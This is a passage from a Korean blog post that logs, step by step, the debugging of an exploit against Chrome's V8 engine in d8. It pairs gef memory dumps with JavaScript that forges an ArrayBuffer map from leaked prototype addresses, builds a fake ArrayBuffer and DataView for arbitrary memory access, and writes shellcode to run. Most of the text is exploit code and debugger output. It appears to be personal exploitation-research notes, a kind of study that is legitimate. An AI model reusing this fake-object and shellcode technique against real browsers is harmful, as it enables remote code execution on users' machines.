x64 d8 debuging

카테고리 없음 2019. 4. 2. 23:03

[.] 1.ab_prot_addr: 0xaedb4791b49

gef➤  x/32gx 0xaedb4791b48-0x70
0xaedb4791ad8: 0x00000f52d2183179 0x00000aedb4791b21
0xaedb4791ae8: 0x00000c3bb5c02241 0x00000f52d2185fe1
0xaedb4791af8: 0x00000c3bb5c68ae9 0x00000aedb4783bf9
0xaedb4791b08: 0x00000c3bb5c04cf9 0x00000196d55d2200
0xaedb4791b18: 0x00000c3bb5c02311 0x00003b553b682309
0xaedb4791b28: 0x0000000300000000 0x0000000800000000
0xaedb4791b38: 0x00000c3bb5c02311 0x00000c3bb5c02311
0xaedb4791b48: 0x00000f52d2186039 0x00000c3bb5c02241
0xaedb4791b58: 0x00000c3bb5c02241 0x00000b29b95a39c9
0xaedb4791b68: 0x0000000000000000 0x0000000000000000


[.] 2.u2d(ab_map_obj_float[0x3]): 0xaedb4791b49


[.] 3.ab_map_obj_addr: 0x16929c50a621

gef➤  x/32gx 0x16929c50a620-0x40
0x16929c50a5e0: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c50a5f0: 0x000016929c50a611 0x0000000600000000
0x16929c50a600: 0x00003b553b683f91 0x00000aedb47c9eb1
0x16929c50a610: 0x00003b553b682e09 0x0000000600000000
0x16929c50a620: 0xdaba0000daba0000 0x000900c01f000008
0x16929c50a630: 0x00000000082003ff 0x00000aedb4791b49      ; ab_proto_addr = read_obj_addr(ab.__proto__);
0x16929c50a640: 0x00000aedb4791ad9 0x0000000000000000   ; ab_constructor_addr = ab_proto_addr - 0x70;
0x16929c50a650: 0x00003b553b682519 0x41eb574000000000
0x16929c50a660: 0x00003b553b682519 0x41eb574000000000

[참조]

gef➤  x/20gx 0x0000358452d8ba80
0x358452d8ba80: 0x000023b229484569 0x0000125339f82241      ; 디버깅을 해보면 다른 값이 출력되나 첫번째 값으로 해도  ok0x358452d8ba90: 0x0000125339f82241 0x0000358452d8ba41   ; 단, 다른 값을 사용하면 --allow_natives_syntax 는 꽥임
0x358452d8baa0: 0x0000000000000000 0x0000000c00000000
0x358452d8bab0: 0x0000000000000000 0x0000000000000000
0x358452d8bac0: 0x00000e2a9ea831d1 0x0000000000000003

 

gef➤  x/32gx 0x000023b229484568
0x23b229484568: 0x00000e2a9ea82259 0x000900c21b000008 ; 정상적으로 디버깅 한 값과 같음
0x23b229484578: 0x00000000082003ff 0x00001b050c00b471 ; ab .value
0x23b229484588: 0x00001b050c00b401 0x0000000000000000

 

 

        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]
        ab_proto_addr = read_obj_addr(ab.__proto__);
        ab_constructor_addr = ab_proto_addr - 0x70;
        //alert(ab_proto_addr.toString(16));
        ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
        ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
        ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
        ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
        float_arr = [];
        /*for(var i = 0;i < 0x100;i++){
                float_arr[i] = [1.1,1.1,1.1,1.1,1.1,1.1];
        }*/
        gc();
        var ab_map_obj_float = [1.1, 1.1, 1.1, 1.1, 1.1, 1.1];  //6개
        change_to_float(ab_map_obj,ab_map_obj_float);


[.] 4.fake_ab_float_addr: 0x16929c56d571

➤  x/32gx 0x16929c56d570-0x40
0x16929c56d530: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c56d540: 0x000016929c56d561 0x0000000600000000
0x16929c56d550: 0x00003b553b683f91 0x00000aedb47d0091
0x16929c56d560: 0x00003b553b682e09 0x0000000600000000
0x16929c56d570: 0x000016929c50a621 0x000016929c50a621
0x16929c56d580: 0x000016929c50a621 0x0000400000000000      ; 버퍼길이
0x16929c56d590: 0x00000196d55e9ba0 0x0000000000000004
0x16929c56d5a0: 0x00003b553b682519 0x40b6929c50a62100
0x16929c56d5b0: 0x00003b553b682519 0xc1d8ebd677c00000

        var fake_ab = [
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                0x0,0x4000, /* buffer length */
                0x12345678,0x123,/* buffer address */
                0x4,0x0
        ]
        var fake_ab_float = [1.1,1.1,1.1,1.1,1.1,1.1];   //6개
        change_to_float(fake_ab,fake_ab_float);


[.] 5.fake_ab_float[4]: 0x12312345678

        fake_arraybuffer = double_arr42[1];
        fake_dv = new DataView(fake_arraybuffer,0,0x4000);

almost done!!


[.]shellcode_address_ref: 0x1f85944d4560
[.]shellcode_address_ref: 0x1f85944d4560

gef➤  x/32gx 0x1f85944d4560
0x1f85944d4560: 0x00000196d55e9ba0 0x00000c3bb5c02311
0x1f85944d4570: 0x00000f52d218ee31 0x00001f85944d45a1
0x1f85944d4580: 0x00001f85944d4961 0x0000000100000000
0x1f85944d4590: 0x00003b553b683f91 0x00000aedb47d8429
0x1f85944d45a0: 0x00003b553b682309 0x0000000300000000
0x1f85944d45b0: 0x0000000100000000 0x00000c3bb5c02311
0x1f85944d45c0: 0x00000c3bb5c02311 0x00003b553b682e09


[.]shellcode_address: 0x196d55e9ba0

gef➤  x/32gx 0x196d55e9ba0
0x196d55e9ba0: 0x90909090cccccccc 0x0f014f40f61f478b
0x196d55e9bb0: 0x708b4c000000c585 0x96d55e9b41b9483f
0x196d55e9bc0: 0x0f07483b48000001 0x4f8b48000000ba85


[.]shellcode write
[.]shellcode write
[*]go to shellcode plz,chrome!

Posted by goldpapa
,

티스토리툴바